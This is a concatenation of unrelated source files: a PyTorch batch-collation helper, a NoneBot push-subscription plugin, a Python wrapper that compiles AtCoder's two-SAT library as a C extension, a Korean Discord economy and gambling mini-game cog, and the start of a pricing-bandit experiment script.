            lengths = [len(seq) for seq in seqs]  # longest src_len in the batch
            padded_seqs = torch.zeros(len(seqs), max(lengths)).long()
            padded_seq_exts = torch.zeros(len(seqs), max(lengths)).long()
            padded_seq_aln = torch.zeros(len(seqs), max(lengths)).long()
            for i, seq in enumerate(seqs):
                end = lengths[i]
                padded_seqs[i, :end] = torch.LongTensor(seq)
                padded_seq_exts[i, :end] = torch.LongTensor(seq_exts[i])
                if multiple == "three":
                    padded_seq_aln[i,:end] = torch.LongTensor(seq_aln[i])
            if multiple == "two": return padded_seqs, padded_seq_exts, lengths
            else: return padded_seqs, padded_seq_exts, padded_seq_aln, lengths
        else:
            lengths = [len(seq) for seq in sequences]
            padded_seqs = torch.zeros(len(sequences), max(lengths)).long()
            for i, seq in enumerate(sequences):
                end = lengths[i]
                padded_seqs[i, :end] = torch.LongTensor(seq)
            return padded_seqs, lengths

    def double_merge(r_seqs, labels, r_lens, src_len, lens, nums):
        # Pad per-review id lists into a (bsz, max_r_num, max_r_len) tensor,
        # along with a review-count mask, per-review lengths and labels.
        max_r_len = max(lens)
        max_r_num = max(nums)
        padded_seqs = torch.zeros(len(r_seqs), max_r_num, max_r_len).long()
        # First position defaults to EOS so fully-padded review slots are non-empty.
        padded_seqs[:,:,0] = config.EOS_idx
        num_mask = torch.zeros(len(r_seqs), max_r_num).bool()
        padded_len = torch.ones(len(r_seqs), max_r_num).long()
        padded_label = torch.zeros(len(r_seqs), max_r_num).long()
        max_src_len = max(src_len)
        lens_list = []
        s = 0
        for i, rs in enumerate(r_seqs):
            item_lens = r_lens[i] + [max_src_len-src_len[i]]  # lengths of reviews and pad
            lens_list.append(item_lens)
            num_mask[i,:len(rs)] = True
            padded_len[i,:len(rs)] = torch.LongTensor(r_lens[i])
            padded_label[i,:len(rs)] = torch.LongTensor(labels[i])
            for ri, r in enumerate(rs):
                end = r_lens[i][ri]  # length of the current review
                padded_seqs[i, ri, :end] = torch.LongTensor(r)
        return padded_seqs, padded_label, num_mask, padded_len, lens_list

    # Sort by source token length, descending — presumably for packed-sequence
    # style consumers; confirm against the model code.
    batch_data.sort(key=lambda x: len(x["ipt_token"]), reverse=True)
    item_info = {}
    for key in batch_data[0].keys():
        item_info[key] = [d[key] for d in batch_data]
    ## reviews - token sequence
    tok_batch, tok_ext_batch, src_length = merge((item_info['ipt_token'], item_info['ipt_ext']),
                                                 multiple="two")
    ## reviews - review sequence
    reviews_batch, labels_batch, reviews_mask, reviews_len, len_list = double_merge(item_info['ipt_review'],
                                                                                    item_info['label'],
                                                                                    item_info["review_len"],
                                                                                    src_length,
                                                                                    item_info['max_len'],
                                                                                    item_info['num'])
    ## Target
    tag_batch, tag_ext_batch, tag_aln_batch, tgt_length = merge((item_info['tag'], item_info['tag_ext'], item_info['tag_aln']),
                                                                multiple="three")
    d = {}
    d['review_batch'] = tok_batch.to(config.device)  # (bsz, src_len)
    d['review_length'] = torch.LongTensor(src_length).to(config.device)  # (bsz,)
    d['review_ext_batch'] = tok_ext_batch.to(config.device)  # (bsz, src_len)
    d['reviews_batch'] = reviews_batch.to(config.device)  # (bsz, max_r_num, max_r_len)
    d['reviews_mask'] = reviews_mask.to(config.device)  # (bsz, max_r_num)
    d['reviews_length'] = reviews_len.to(config.device)  # (bsz, max_r_num)
    d['reviews_length_list'] = len_list  # list of list. for splitting reviews and pad
    d['reviews_label'] = labels_batch.to(config.device)
    ##output
    d['tags_batch'] = tag_batch.to(config.device)  # (bsz, max_target_len)
    d['tags_length'] = torch.LongTensor(tgt_length).to(config.device)
    d['tags_ext_batch'] = tag_ext_batch.to(config.device)
    d['tags_idx_batch'] = tag_aln_batch.to(config.device)
    ##text
    d['review_text'] = item_info['review_text']
    d['label'] = item_info['label']
    d['tag_text'] = item_info['tag_text']
    d['oovs'] = item_info["oovs"]
    return d
def write_config():
    """Persist the run's CLI flags to <save_path>/config.txt (skipped in test mode)."""
    if config.test:
        return
    if not os.path.exists(config.save_path):
        os.makedirs(config.save_path)
    with open(config.save_path + 'config.txt', 'w') as out:
        for key, value in config.arg.__dict__.items():
            text = str(value)
            if "False" in text:
                # Disabled boolean flags are omitted entirely.
                continue
            if "True" in text:
                # Enabled boolean flags are written without a value.
                out.write("--{} ".format(key))
            else:
                out.write("--{} {} ".format(key, value))
def prepare_data_seq(batch_size=16):
    """Load the dataset splits and wrap them in DataLoaders.

    Returns (train_loader, valid_loader, test_loader, vocab); the test loader
    uses batch size 1 without shuffling.
    """
    pairs_tra, pairs_val, pairs_tst, vocab = load_dataset()
    logging.info("Vocab {} ".format(vocab.n_words))

    def make_loader(pairs, bsz, shuffle):
        # All splits share the same collate_fn.
        return torch.utils.data.DataLoader(dataset=Dataset(pairs, vocab),
                                           batch_size=bsz,
                                           shuffle=shuffle,
                                           collate_fn=collate_fn)

    data_loader_tra = make_loader(pairs_tra, batch_size, True)
    data_loader_val = make_loader(pairs_val, batch_size, True)
    data_loader_tst = make_loader(pairs_tst, 1, False)
    write_config()
    return data_loader_tra, data_loader_val, data_loader_tst, vocab
<gh_stars>1-10
import time
import asyncio
from typing import Callable, Coroutine, List, Dict, Union, Any
import nonebot
from nonebot import require
from nonebot.log import logger
from nonebot.adapters.onebot.v11 import MessageSegment, Message
# from nonebot.internal.adapter.message import Message
# apscheduler instance provided by the nonebot plugin; used for cron push jobs.
scheduler = require("nonebot_plugin_apscheduler").scheduler
# A single piece of push content accepted by publish().
SIMPLE_INFO_TYPE = Union[None, str, int, bytes, MessageSegment, Message]
# A list of simple values, joined into one Message.
COMPLEX_INFO_TYPE = List[SIMPLE_INFO_TYPE]
# Anything publish() accepts.
INFO_TYPE = Union[SIMPLE_INFO_TYPE, COMPLEX_INFO_TYPE]
def _parse_simple_info(info: SIMPLE_INFO_TYPE):
    '''
    Convert a simple info value into a MessageSegment.

    str/int become text segments, bytes become an image segment, and an
    existing MessageSegment passes through unchanged; anything else
    (including None) yields an empty text segment.
    '''
    if isinstance(info, MessageSegment):
        return info
    if isinstance(info, bytes):
        return MessageSegment.image(info)
    if isinstance(info, (str, int)):
        return MessageSegment.text(str(info))
    return MessageSegment.text("")
def _construct_message(info: INFO_TYPE) -> Message:
    '''
    Build a Message from info.

    Simple values are delegated to _parse_simple_info; a list is folded into
    one Message segment by segment. Returns None for an empty list or an
    unsupported type.
    '''
    if isinstance(info, (str, int, bytes, MessageSegment, Message)):
        return _parse_simple_info(info)
    if isinstance(info, list):
        msg: Message = None
        for element in info:
            segment = _parse_simple_info(element)
            if msg is None:
                msg = Message(segment)
            else:
                msg += segment
        return msg
    return None
class topic:
    '''
    The basic unit of a subscription; every operation is ultimately carried
    out by a topic object.

    Attributes:
        name: Full descriptive name of the topic's job.
        title: Topic title; also the primary key.
        aliases: Alternative names through which the topic can be reached.
        cron: Cron trigger parameters as a dict, kept so they can be persisted;
            unused at runtime.
        immediately: When True, published info is pushed right away instead of
            on the cron schedule.
        hide: When True, the topic is not exposed to users/groups.
        no_check: When True, the liveness counter is not advanced.
        info: The message to be pushed next.
        cache: The previously published message.
        to_callable: When not None, this value is sent to callable subscribers
            instead of info.
        last_send: Timestamp of the last push.
        last_publish: Timestamp of the last publish.
        check_count: Liveness counter; releasing the object at a threshold is
            not implemented yet.
        job: The scheduler job object; internal use only.
        subscriber: External subscribers; written to storage at backup time or
            on bot shutdown.
        subscriber_callable: In-bot callable subscribers; never persisted.
        black_list: Subscribers banned from this topic.

    Methods:
        pack: Bundle the members into a dict for storage.
        update: Refresh the topic when register is called again with the same title.
        publish: Returned by register; used by producers to publish content.
        subscribe / remove: Final executors for subscribing / unsubscribing.
        ban / unban: Final executors for (un)banning a subscriber.
        send: Push the content; may be split into its own module later.
    '''
    name: str = ""
    title: str = ""
    aliases: List[str] = None
    cron: Dict[Any, Any] = None
    immediately: bool = False
    hide: bool = False
    no_check: bool = False  # internal to the plugin; not recommended for external callers
    info: Message = None
    cache: Message = None
    to_callable: Any = None
    last_send: float = -1
    last_publish: float = -1
    check_count: int = 0
    job = None
    subscriber: Dict[str, List[Union[str, int]]] = None
    subscriber_callable: List[Callable[[Any], Any]] = None
    black_list: Dict[str, List[Union[str, int]]] = None

    def __str__(self) -> str:
        return self.name if self.name != "" else self.title

    def pack(self):
        '''
        Pack this topic into a dict so it can be saved to storage.
        '''
        package = {
            "name": self.name,
            "title": self.title,
            "aliases": self.aliases,
            "immediately": self.immediately,
            "hide": self.hide,
            "no_check": self.no_check,
            "subscriber": self.subscriber,
            "black_list": self.black_list
        }
        package.update(self.cron)
        return package

    def __init__(
        self,
        title: str,
        hour: Union[str, int],
        name: str = "",
        aliases: List[str] = None,
        immediately: bool = False,
        hide: bool = False,
        no_check: bool = False,
        subscriber: Dict[str, List[Union[str, int]]] = None,
        black_list: Dict[str, List[Union[str, int]]] = None,
        **kwarg
    ) -> None:
        '''
        topic constructor.

        Args:
            title: See class attributes.
            hour: Passed to the scheduler's cron trigger.
            name / aliases / immediately / no_check: See class attributes.
            subscriber: Pre-existing subscriber map, normally loaded from
                storage rather than passed in code.
            kwarg: Extra cron parameters forwarded to apscheduler.
        '''
        self.title = title
        self.name = name
        self.aliases = aliases if aliases is not None else []
        self.immediately = immediately
        self.hide = hide
        self.no_check = no_check
        self.subscriber = subscriber if subscriber is not None else {}
        self.subscriber_callable = []
        self.black_list = black_list if black_list is not None else {}
        if not immediately:
            self.job = scheduler.add_job(
                self.send,
                "cron",
                hour=hour,
                **kwarg
            )
            self.cron = kwarg
            self.cron["hour"] = hour
        else:
            # Fixed: cron previously stayed None for immediate topics, which
            # made pack() crash on `package.update(self.cron)`.
            self.cron = {}
        logger.debug(f"{name} 注册完成")

    def update(
        self,
        hour: Union[str, int],
        name: str = "",
        aliases: List[str] = None,
        immediately: bool = False,
        hide: bool = False,
        no_check: bool = False,
        **kwarg
    ):
        '''
        Refresh this topic when register is called again for the same title;
        parameters mirror __init__.
        '''
        if name != "":
            self.name = name
        if aliases is not None:
            self.aliases = aliases
        if self.immediately and not immediately:
            # Switching from immediate mode back to scheduled mode.
            if self.job is None:
                self.job = scheduler.add_job(
                    self.send,
                    "cron",
                    hour=hour,
                    **kwarg
                )
                self.cron = kwarg
                self.cron["hour"] = hour
            else:
                self.job.reschedule("cron", **kwarg)
                self.job.resume()
                self.cron = kwarg
                self.cron["hour"] = hour
        elif not self.immediately and immediately:
            # Switching to immediate mode: suspend the cron job.
            self.job.pause()
            self.cron = {}
        self.immediately = immediately
        self.hide = hide
        self.no_check = no_check
        logger.debug(f"{self.name if self.name != '' else self.title} 更新完成")

    def publish(
        self,
        info: INFO_TYPE,
        to_callable: Any = None,
        immediately: bool = False
    ) -> bool:
        '''
        Publish new content on this topic.

        Args:
            info: The message to push; accepts several input shapes.
            to_callable: When not None, this value is pushed to callable
                subscribers instead of info.
            immediately: Push right away for this publish only; does not change
                the topic's own mode.
        '''
        logger.debug(f"{self.name if self.name != '' else self.title} 准备发布")
        self.cache = self.info
        self.info = _construct_message(info)
        if to_callable is not None:
            self.to_callable = to_callable
        self.last_publish = time.time()
        if immediately:
            # Fixed: send() is a coroutine; calling it bare only created a
            # never-awaited coroutine object, so the immediate push never
            # happened. Schedule it on the running event loop instead.
            asyncio.create_task(self.send())
            return True
        return True

    def subscribe(
        self,
        subscriber: Union[Union[str, int], Callable[[Any], Any]],
        type_: str = "callable"
    ) -> bool:
        '''
        Final executor for a subscribe operation.

        Args:
            subscriber: The subscriber (id or callable).
            type_: Subscriber kind, normally "users" or "groups".
        '''
        if not self.is_exposed(subscriber, type_):
            return False
        logger.debug(f"{self.name if self.name != '' else self.title} 被订阅")
        if isinstance(subscriber, Callable):
            if subscriber in self.subscriber_callable:
                return False
            self.subscriber_callable.append(subscriber)
            return True
        if type_ not in self.subscriber:
            self.subscriber[type_] = []
        subscriber = str(subscriber)
        if subscriber in self.subscriber[type_]:
            return False
        self.subscriber[type_].append(subscriber)
        return True

    def remove(
        self,
        subscriber: Union[Union[str, int], Callable[[Any], Any]],
        type_: str
    ) -> bool:
        '''
        Final executor for an unsubscribe operation.

        Args:
            subscriber: The subscriber (id or callable).
            type_: Subscriber kind, normally "users" or "groups".
        '''
        logger.debug(f"{self.name if self.name != '' else self.title} 被取消订阅")
        if isinstance(subscriber, Callable):
            if subscriber not in self.subscriber_callable:
                return False
            self.subscriber_callable.remove(subscriber)
            return True
        if type_ not in self.subscriber:
            return False
        subscriber = str(subscriber)
        if subscriber not in self.subscriber[type_]:
            return False
        self.subscriber[type_].remove(subscriber)
        return True

    def is_exposed(
        self,
        subscriber: Union[str, int] = None,
        type_: str = None,
    ) -> bool:
        '''
        Check whether this service may be exposed to the given user/group.

        Args:
            subscriber: The subscriber id.
            type_: Subscriber kind, normally "users" or "groups".
        '''
        if type_ == "callable":
            return True
        if subscriber is None or type_ is None:
            # NOTE(review): this returns self.hide, i.e. hidden topics report
            # True when no subscriber is given — looks inverted; confirm intent
            # before changing, callers may rely on it.
            return self.hide
        if type_ in self.black_list and subscriber in self.black_list[type_]:
            return False
        return True

    def ban(
        self,
        subscriber: Union[str, int],
        type_: str
    ) -> bool:
        '''
        Final executor for a ban operation; also removes an existing subscription.

        Args:
            subscriber: The subscriber id.
            type_: Subscriber kind, normally "users" or "groups".
        '''
        if type_ not in self.black_list:
            self.black_list[type_] = []
        subscriber = str(subscriber)
        if subscriber in self.black_list[type_]:
            return False
        self.black_list[type_].append(subscriber)
        self.remove(subscriber, type_)
        return True

    def unban(
        self,
        subscriber: Union[str, int],
        type_: str
    ) -> bool:
        '''
        Final executor for an unban operation.

        Args:
            subscriber: The subscriber id.
            type_: Subscriber kind, normally "users" or "groups".
        '''
        if type_ not in self.black_list:
            return False
        subscriber = str(subscriber)
        if subscriber not in self.black_list[type_]:
            return False
        self.black_list[type_].remove(subscriber)
        return True

    async def send(self):
        '''
        Push the current content to all subscribers (users, groups, callables).
        '''
        if self.info is None:
            logger.warning(
                f"{self.name if self.name != '' else self.title} 未准备好"
            )
            return
        # Nothing new was published since the last push: advance the liveness counter.
        if self.last_send > self.last_publish:
            self.check_count += 1
        self.last_send = time.time()
        logger.info(
            f"{self.name if self.name != '' else self.title} 正在推送"
        )
        if "users" in self.subscriber:
            for user in self.subscriber["users"]:
                await nonebot.get_bot().send_private_msg(
                    user_id=int(user),
                    message=self.info
                )
        if "groups" in self.subscriber:
            for group in self.subscriber["groups"]:
                await nonebot.get_bot().send_group_msg(
                    group_id=int(group),
                    message=self.info
                )
        payload = self.info if self.to_callable is None else self.to_callable
        for func in self.subscriber_callable:
            # Fixed: the original awaited coroutine subscribers and then called
            # them AGAIN unconditionally (missing else), delivering twice and
            # creating unawaited coroutine objects. Call each exactly once.
            if asyncio.iscoroutinefunction(func):
                await func(payload)
            else:
                func(payload)
        self.to_callable = None
|
# TODO: check for memory leaks
# TODO: write __repr__
code_two_sat = r"""
#define PY_SSIZE_T_CLEAN
#include <Python.h>
#include "structmember.h"
// 元のライブラリの private を剥がした
// >>> AtCoder >>>
#ifndef ATCODER_TWOSAT_HPP
#define ATCODER_TWOSAT_HPP 1
#ifndef ATCODER_INTERNAL_SCC_HPP
#define ATCODER_INTERNAL_SCC_HPP 1
#include <algorithm>
#include <utility>
#include <vector>
namespace atcoder {
namespace internal {
template <class E> struct csr {
std::vector<int> start;
std::vector<E> elist;
csr(int n, const std::vector<std::pair<int, E>>& edges)
: start(n + 1), elist(edges.size()) {
for (auto e : edges) {
start[e.first + 1]++;
}
for (int i = 1; i <= n; i++) {
start[i] += start[i - 1];
}
auto counter = start;
for (auto e : edges) {
elist[counter[e.first]++] = e.second;
}
}
};
// Reference:
// <NAME>,
// Depth-First Search and Linear Graph Algorithms
struct scc_graph {
public:
scc_graph(int n) : _n(n) {}
int num_vertices() { return _n; }
void add_edge(int from, int to) { edges.push_back({from, {to}}); }
// @return pair of (# of scc, scc id)
std::pair<int, std::vector<int>> scc_ids() {
auto g = csr<edge>(_n, edges);
int now_ord = 0, group_num = 0;
std::vector<int> visited, low(_n), ord(_n, -1), ids(_n);
visited.reserve(_n);
auto dfs = [&](auto self, int v) -> void {
low[v] = ord[v] = now_ord++;
visited.push_back(v);
for (int i = g.start[v]; i < g.start[v + 1]; i++) {
auto to = g.elist[i].to;
if (ord[to] == -1) {
self(self, to);
low[v] = std::min(low[v], low[to]);
} else {
low[v] = std::min(low[v], ord[to]);
}
}
if (low[v] == ord[v]) {
while (true) {
int u = visited.back();
visited.pop_back();
ord[u] = _n;
ids[u] = group_num;
if (u == v) break;
}
group_num++;
}
};
for (int i = 0; i < _n; i++) {
if (ord[i] == -1) dfs(dfs, i);
}
for (auto& x : ids) {
x = group_num - 1 - x;
}
return {group_num, ids};
}
std::vector<std::vector<int>> scc() {
auto ids = scc_ids();
int group_num = ids.first;
std::vector<int> counts(group_num);
for (auto x : ids.second) counts[x]++;
std::vector<std::vector<int>> groups(ids.first);
for (int i = 0; i < group_num; i++) {
groups[i].reserve(counts[i]);
}
for (int i = 0; i < _n; i++) {
groups[ids.second[i]].push_back(i);
}
return groups;
}
private:
int _n;
struct edge {
int to;
};
std::vector<std::pair<int, edge>> edges;
};
} // namespace internal
} // namespace atcoder
#endif // ATCODER_INTERNAL_SCC_HPP
#include <cassert>
#include <vector>
namespace atcoder {
// Reference:
// <NAME>, M. Plass, and <NAME>,
// A Linear-Time Algorithm for Testing the Truth of Certain Quantified Boolean
// Formulas
struct two_sat {
public:
two_sat() : _n(0), scc(0) {}
two_sat(int n) : _n(n), _answer(n), scc(2 * n) {}
void add_clause(int i, bool f, int j, bool g) {
assert(0 <= i && i < _n);
assert(0 <= j && j < _n);
scc.add_edge(2 * i + (f ? 0 : 1), 2 * j + (g ? 1 : 0));
scc.add_edge(2 * j + (g ? 0 : 1), 2 * i + (f ? 1 : 0));
}
bool satisfiable() {
auto id = scc.scc_ids().second;
for (int i = 0; i < _n; i++) {
if (id[2 * i] == id[2 * i + 1]) return false;
_answer[i] = id[2 * i] < id[2 * i + 1];
}
return true;
}
std::vector<bool> answer() { return _answer; }
// private:
int _n;
std::vector<bool> _answer;
internal::scc_graph scc;
};
} // namespace atcoder
#endif // ATCODER_TWOSAT_HPP
// <<< AtCoder <<<
using namespace std;
using namespace atcoder;
#define PARSE_ARGS(types, ...) if(!PyArg_ParseTuple(args, types, __VA_ARGS__)) return NULL
struct TwoSAT{
PyObject_HEAD
two_sat* ts;
};
extern PyTypeObject TwoSATType;
// >>> TwoSAT definition >>>
static void TwoSAT_dealloc(TwoSAT* self){
delete self->ts;
Py_TYPE(self)->tp_free((PyObject*)self);
}
static PyObject* TwoSAT_new(PyTypeObject* type, PyObject* args, PyObject* kwds){
return type->tp_alloc(type, 0);
}
static int TwoSAT_init(TwoSAT* self, PyObject* args){
long n;
if(!PyArg_ParseTuple(args, "l", &n)) return -1;
if(n < 0 || n > (long)1e8){
PyErr_Format(PyExc_IndexError,
"TwoSAT constructor constraint error (constraint: 0<=n<=1e8, got n=%d)", n);
return -1;
}
self->ts = new two_sat(n);
return 0;
}
static PyObject* TwoSAT_add_clause(TwoSAT* self, PyObject* args){
long i, j;
int f, g;
PARSE_ARGS("lplp", &i, &f, &j, &g);
if(i < 0 || i >= self->ts->_n || j < 0 || j >= self->ts->_n){
PyErr_Format(PyExc_IndexError,
"TwoSAT add_clause index out of range (n=%d, i=%d, j=%d)", self->ts->_n, i, j);
return (PyObject*)NULL;
}
self->ts->add_clause(i, (bool)f, j, (bool)g);
Py_RETURN_NONE;
}
static PyObject* TwoSAT_satisfiable(TwoSAT* self, PyObject* args){
PyObject* res = self->ts->satisfiable() ? Py_True : Py_False;
return Py_BuildValue("O", res);
}
static PyObject* TwoSAT_answer(TwoSAT* self, PyObject* args){
const vector<bool>& answer = self->ts->answer();
const int& n = self->ts->_n;
PyObject* list = PyList_New(n);
for(int i = 0; i < n; i++){
PyList_SET_ITEM(list, i, Py_BuildValue("O", answer[i] ? Py_True : Py_False));
}
return list;
}
/*
static PyObject* TwoSAT_repr(PyObject* self){
PyObject* res = PyUnicode_FromFormat("TwoSAT()");
return res;
}
*/
static PyMethodDef TwoSAT_methods[] = {
{"add_clause", (PyCFunction)TwoSAT_add_clause, METH_VARARGS, "Add clause"},
{"satisfiable", (PyCFunction)TwoSAT_satisfiable, METH_VARARGS, "Check if problem satisfiable"},
{"answer", (PyCFunction)TwoSAT_answer, METH_VARARGS, "Get answer"},
{NULL} /* Sentinel */
};
PyTypeObject TwoSATType = {
PyObject_HEAD_INIT(NULL)
"acl_twosat.TwoSAT", /*tp_name*/
sizeof(TwoSAT), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)TwoSAT_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*reserved*/
0,//TwoSAT_repr, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/
0, /*tp_doc*/
0, /*tp_traverse*/
0, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
TwoSAT_methods, /*tp_methods*/
0, /*tp_members*/
0, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
(initproc)TwoSAT_init, /*tp_init*/
0, /*tp_alloc*/
TwoSAT_new, /*tp_new*/
0, /*tp_free*/
0, /*tp_is_gc*/
0, /*tp_bases*/
0, /*tp_mro*/
0, /*tp_cache*/
0, /*tp_subclasses*/
0, /*tp_weaklist*/
0, /*tp_del*/
0, /*tp_version_tag*/
0, /*tp_finalize*/
};
// <<< TwoSAT definition <<<
static PyModuleDef acl_twosatmodule = {
PyModuleDef_HEAD_INIT,
"acl_twosat",
NULL,
-1,
};
PyMODINIT_FUNC PyInit_acl_twosat(void)
{
PyObject* m;
if(PyType_Ready(&TwoSATType) < 0) return NULL;
m = PyModule_Create(&acl_twosatmodule);
if(m == NULL) return NULL;
Py_INCREF(&TwoSATType);
if (PyModule_AddObject(m, "TwoSAT", (PyObject*)&TwoSATType) < 0) {
Py_DECREF(&TwoSATType);
Py_DECREF(m);
return NULL;
}
return m;
}
"""
# setup.py source written to disk at judge time to build the C extension.
# NOTE: the string body is emitted verbatim to two_sat_setup.py — do not edit
# it cosmetically; any change alters the generated build script.
code_two_sat_setup = r"""
from distutils.core import setup, Extension
module = Extension(
    "acl_twosat",
    sources=["two_sat.cpp"],
    extra_compile_args=["-O3", "-march=native", "-std=c++14"]
)
setup(
    name="acl_twosat",
    version="0.0.1",
    description="wrapper for atcoder library twosat",
    ext_modules=[module]
)
"""
import os
import sys
# Compile the extension only during the judge's precompilation pass
# ("ONLINE_JUDGE" argv sentinel) or when running outside the sandbox;
# the actual submission run then just imports the prebuilt module.
if sys.argv[-1] == "ONLINE_JUDGE" or os.getcwd() != "/imojudge/sandbox":
    with open("two_sat.cpp", "w") as f:
        f.write(code_two_sat)
    with open("two_sat_setup.py", "w") as f:
        f.write(code_two_sat_setup)
    os.system(f"{sys.executable} two_sat_setup.py build_ext --inplace")
from acl_twosat import TwoSAT
|
import asyncio
import discord
import json
import random
import math
import time
import datetime
import os
import shutil
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.font_manager as fm
from discord.ext import commands
from discord.ext import tasks
class Stock(commands.Cog):
    """Economy mini-game cog.

    Every user has a wallet persisted in ``stock/usr_data.json`` shaped as
    ``{user_id: {"money": int, "alba": "YYYYMMDD" | None}}``.
    """

    # Single place for the wallet file path (was repeated in every command).
    USER_DATA_PATH = "stock/usr_data.json"

    def __init__(self, client):
        self.client = client
        print(f'{__name__} 로드 완료!')

    def _load_users(self):
        """Read and return the wallet dict from disk."""
        with open(self.USER_DATA_PATH, 'r') as f:
            return json.load(f)

    def _save_users(self, user_data):
        """Write the wallet dict back to disk."""
        with open(self.USER_DATA_PATH, 'w') as f:
            json.dump(user_data, f, indent=4)

    @commands.command(aliases=["차트", "매수", "매도", "그래프", "주식정보", "주식구매", "주식판매"])
    async def 주식(self, ctx):
        """Stock-trading commands — currently disabled for maintenance."""
        await ctx.send("현재 점검중인 기능입니다.")

    @commands.command()
    async def 계정생성(self, ctx):
        """Create a wallet for the invoker with 1000 starting money."""
        user_id = str(ctx.author.id)
        user_data = self._load_users()
        if user_id in user_data:
            await ctx.send('이미 등록된 계정입니다.')
            return
        user_data[user_id] = {"money": 1000, "alba": None}
        self._save_users(user_data)
        await ctx.send('계정을 생성했습니다!')

    @commands.command()
    async def 지갑(self, ctx, member: discord.Member = None):
        """Show a member's balance (defaults to the invoker)."""
        if member is None:
            member = ctx.author
        user_id = str(member.id)
        # Fix: dropped an unused read of stock/data.json that the original
        # performed on every call.
        user_data = self._load_users()
        try:
            embed = discord.Embed(title='지갑', description=str(member.mention), colour=discord.Color.red())
            embed.add_field(name='돈', value=f'{str(user_data[user_id]["money"])}원', inline=False)
            await ctx.send(embed=embed)
        except KeyError:
            await ctx.send('계정을 먼저 생성해주세요.')

    @commands.command(aliases=["알바"])
    async def 알바하자(self, ctx):
        """Part-time job: random payout, at most once per calendar day."""
        author_id = str(ctx.author.id)
        currenttime = time.strftime('%Y%m%d')
        money = self._load_users()
        try:
            last_day = money[author_id]['alba']
            if last_day is not None and int(currenttime) == int(last_day):
                await ctx.send("알바는 하루에 1번만 가능합니다.")
                return
            got_money = random.choice([1000, 2000, 3000, 4000, 5000, 6000, 7000, 8590])
            await ctx.send(f'돈이다. ({got_money}원)')
            money[author_id]['money'] += got_money
            money[author_id]['alba'] = currenttime
            self._save_users(money)
        except KeyError:
            await ctx.send('계정을 먼저 생성해주세요.')
            return

    @commands.command()
    async def 가즈아(self, ctx, amount):
        """Gamble *amount*: 1/3 chance to net 3x, 2/3 chance to lose it."""
        try:
            amount = int(amount)
        except ValueError:
            # Bug fix: a non-numeric argument used to raise an unhandled
            # ValueError instead of replying to the user.
            await ctx.send('1원 이상으로 입력해주세요.')
            return
        author_id = str(ctx.author.id)
        if amount <= 0:
            await ctx.send('1원 이상으로 입력해주세요.')
            return
        money = self._load_users()
        try:
            if amount > money[author_id]['money']:
                await ctx.send('돈이 부족합니다.')
                return
            money[author_id]['money'] -= amount
            if random.choice(['yes', 'no', 'no']) == 'yes':
                # The stake was already deducted, so +4x stake nets +3x.
                await ctx.send('도박에 성공했습니다. 3배의 돈을 벌었습니다.')
                money[author_id]['money'] += amount * 4
            else:
                await ctx.send('도박에 실패했습니다. 돈을 잃었습니다.')
            self._save_users(money)
        except KeyError:
            await ctx.send('계정을 먼저 생성해주세요.')
            return

    @commands.command()
    async def 한강가즈아(self, ctx):
        """Delete the invoker's wallet entirely."""
        author_id = str(ctx.author.id)
        try:
            money = self._load_users()
            del money[author_id]
            self._save_users(money)
        except KeyError:
            await ctx.send('계정을 먼저 생성해주세요.')
            return
        await ctx.send('당신은 한강에서 사망하셨습니다. 계정이 삭제되었습니다.')

    @commands.command()
    async def 가위바위보(self, ctx):
        """Rock-paper-scissors vs the bot: +100 on a win, +50 on a draw."""
        user_id = str(ctx.author.id)
        user_data = self._load_users()
        if user_id not in user_data:
            # Fix: check the account before prompting instead of after.
            await ctx.send('계정을 먼저 생성해주세요.')
            return
        await ctx.send("`가위, 바위, 보` 중에서 하나를 5초 안에 말해주세요!")
        rpc = ['가위', '바위', '보']

        def check(m):
            # Bug fix: only accept a move from the command invoker in the same
            # channel; the original matched any user's message anywhere.
            return m.author == ctx.author and m.channel == ctx.channel and m.content in rpc

        def game(A, B):
            """Return 1 if A beats B, 2 on a draw, 3 if B beats A."""
            if A not in rpc:
                return
            if A == rpc[0] and B == rpc[2] or A == rpc[1] and B == rpc[0] or A == rpc[2] and B == rpc[1]:
                return 1
            elif A == B:
                return 2
            elif A == rpc[0] and B == rpc[1] or A == rpc[1] and B == rpc[2] or A == rpc[2] and B == rpc[0]:
                return 3

        try:
            answer = await self.client.wait_for("message", timeout=5, check=check)
        except asyncio.TimeoutError:
            await ctx.send("시간이 초과됬어요...")
            return
        choice = random.choice(rpc)
        result = game(answer.content, choice)
        if result == 1:
            await ctx.send(f"{ctx.author.mention}님이 이겼어요... ({answer.content}, {choice})\n`+100원`")
            user_data[user_id]["money"] += 100
        elif result == 3:
            await ctx.send(f"제가 이겼어요! ({answer.content}, {choice})")
        elif result == 2:
            await ctx.send(f"비겼네요. ({answer.content}, {choice})\n`+50원`")
            user_data[user_id]["money"] += 50
        self._save_users(user_data)
def setup(client):
    # Entry point used by discord.py's load_extension to register this cog.
    client.add_cog(Stock(client))
|
import os
import sys
import pickle
from typing import List
import numpy as np
import pandas as pd
from scipy.optimize import minimize_scalar
os.environ["OPENBLAS_NUM_THREADS"] = "1"
sys.path.append("../../")
from environments.Settings.EnvironmentManager import EnvironmentManager
from environments.Settings.Scenario import Scenario
from utils.folder_management import handle_folder_creation
from utils.stats.StochasticFunction import IStochasticFunction, AggregatedFunction, MultipliedStochasticFunction
# Scenario under analysis and the directory where the generated CSVs land.
SCENARIO_NAME = "linear_visit_tanh_price"
FOLDER_RESULT = "../../report/csv/pricing_bandit/{}/".format(SCENARIO_NAME)
# Flags selecting which regret CSV files are produced below.
CSV_DISCRETE_USER_REGRET = True
CSV_CONTINUE_USER_REGRET = True
CSV_DAILY_DISCRETE_REGRET = True
CSV_DAILY_CONT_REGRET = True
# Pricing experiment constants: number of discrete price arms, the fixed
# budget split across the three sub-campaigns, plot resolution, the feasible
# price interval and the fixed unit cost subtracted from the price.
